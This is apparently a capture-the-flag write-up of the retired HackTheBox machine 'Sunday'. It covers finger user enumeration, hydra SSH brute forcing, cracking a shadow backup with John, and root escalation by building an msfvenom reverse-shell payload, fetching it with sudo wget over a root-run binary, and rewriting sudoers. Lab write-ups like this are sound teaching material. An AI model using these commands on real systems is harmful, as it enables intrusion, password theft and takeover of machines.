HackTheBox.eu - Sunday - Retired - Update

HackTheBox.eu - Sunday - Retired - Update

Recon

I've been using threader3000 for my recon scans lately. It's a staged scanner that does a super quick up/down scan on all TCP and then based on what is up suggests an nmap scan to run against just the open ports. It automatically save the nmap scan as XML which I then convert to HTML

xsltproc ./sunday.htb/sunday.htb.xml -o ./sunday.html

That is some strange results

Nmap says just port 79, 22022, 59822 are open.

It says 79 is finger and has no guess about the other two or what OS might be running here…

Not a lot to go on here. So I just googled finger and pentest and it turns out you can maybe enumerate users with finger. Let's try it.

At first I used a script from

https://raw.githubusercontent.com/pentestmonkey/finger-user-enum/master/finger-user-enum.pl

 

It was running really slow until I saw the switch that lets you change the threads -m

perl ./fingerenum.pl -U ./names.txt -t sunday.htb -m 100

I used the list from

/usr/share/wordlists/wfuzz/others/names.txt

Looks like we got back 12 results from the list we tried.

Admin@sunday.htb: Anne Marie@sunday.htb:                Access@sunday.htb: Dee dee@sunday.htb:  Jo ann@sunday.htb: La verne@sunday.htb: Line@sunday.htb: Message@sunday.htb Miof mela@sunday.htb. Sammy@sunday.htb: Sunny@sunday.htb: Zsa zsa@sunday.htb:

What about the other two ports…. If i don't know what they are I usually just try to netcat to them and see if there is any response.

nc sunday.htb 22022

Looks 22022 is a ssh server… ok

What about 59822

nc sunday.htb 59822

Nothing.

Ok let's regroup, we have a list of possible users and we have SSH running on 22022… that's it, that is all we got.. I guess we need to try to login to ssh as one of the 12 usernames we got, but we don't know what the passwords are.

Let's just try to login with admin/admin

ssh admin@sunday.htb -p 22022

But we got an error aback

Unable to negotiate with 10.10.10.76 port 22022: no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

A quick google search of the error came back with this result

https://www.openssh.com/legacy.html

Let's give it a shot and see if we get any further.

Cool we got further that time, we just needed to tell ssh to use diffie-hellman-group1-sha1

But the user admin/admin didn't work. No worries.

Exploit

Well let's see if we can brute force this with hyda and get a login. This took forever.

I ran hydra with each user name with the rockyou word list. Finally I got a hit back with sunny

hydra -l sunny -P /usr/share/wordlists/rockyou.txt -s 22022 10.10.10.76 ssh

sunday  

Let's try to SSH in as sunny with this password now

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@sunday.htb -p 22022

Yay we got our foothold

And sunday can run a executable called /root/troll with no passwd

Hmmmm there is no user.txt in Sunny's folder…. I guess there is a second user we need to get into now, maybe that sammy account?

Well There is a shadows.backup that we can read in /backups/, maybe we can use that in combination with /etc/passwd to get sammy's password.

I copied this and /etc/passwd to my kali box.

Now that we have both of these files we can use unshadow to format them in a way that JohntheRipper can work with.

** Editorial note - This box is slow as….. something.******

So what unshadow does is combine the passwd file and the shadow file together

unshadow ./passwd ./shadow  > unshadow.txt

No we can feed this into john

john --wordlist=/usr/share/wordlists/rockyou.txt ./unshadow.txt

We got back sunny's password which we already knew was sunday.

But we also got back sammy's which is cooldude!

Let's open another SSH session as sammy.

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sammy@sunday.htb -p 22022

Sammy can run wget as root with no password

So one user can potentially download a file as root, and the other user can execute a file as root….

Are you thinking what I'm thinking?

Can we use sammy to overwrite /root/troll

And then execute it as sunday

But first let's grab that user.txt from sammy's desktop

Let's use msfvenom to build a solaris executable for a reverse shell

msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=10.10.14.15 LPORT=5555 -f elf -e x86/shikata_ga_nai -b '\x00' > troll

Then let's setup our listener and server to serve this over to  sunday

nc -lnvp 5555

Then I just used updog to serve this over to sunday

updog

Then as sammy did this wget to grab my reverse shell and overwrite the /root/troll executable

sudo wget http://10.10.14.15:9090/troll -O /root/troll

Then as soon as that downloaded I went back to sunny and executed the sudo command to run the executable

sudo /root/troll

No errors good, if you see errors it might be that your /root/troll was over written in the time it took you to execute the /root/troll command.

But we check back on the listener and.

We got our shell back as root.

I tried this method the first time I got this box and had trouble getting my reverse shell in time so I ended up using Sammy to overwrite the sudoers file to give sunny sudo rights to su with no passwd.

Then just used su to change to root

What if we overwrite the sudoers file to allow sunny to have access to more than just /root/troll….. What if perhaps we overwrite it to allow su without a password

We know from our outputs earlier we have

At least these two things in the sudoers file

sammy ALL=(root) NOPASSWD: /usr/bin/wget

sunny ALL=(root) NOPASSWSD: /root/troll

And we can assume that root has all privileges also

root ALL=(ALL) ALL

Lets format that

root  ALL=(ALL) ALL

sammy ALL=(root) NOPASSWD: /usr/bin/wget

sunny ALL=(root) NOPASSWD: /root/troll

Ok so if we edit that to have sunny get /su with no password

sunny ALL=(root) NOPASSWD: /usr/bin/su

So then we would have this

root  ALL=(ALL) ALL

sammy ALL=(root) NOPASSWD: /usr/bin/wget

sunny ALL=(root) NOPASSWD: /usr/bin/su